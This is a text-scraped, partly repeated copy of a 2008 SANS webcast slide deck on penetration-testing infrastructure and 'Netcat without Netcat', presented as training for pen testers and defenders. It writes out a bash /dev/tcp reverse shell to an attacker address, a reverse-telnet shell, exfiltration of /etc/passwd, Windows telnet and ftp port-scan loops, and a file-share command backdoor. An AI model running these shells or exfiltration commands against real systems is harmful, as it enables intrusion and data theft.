httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 6
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6
Software for Testing ndash
Free Test Tools
bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work
ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml
bull Other free sources of tools
ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc
ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 7
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
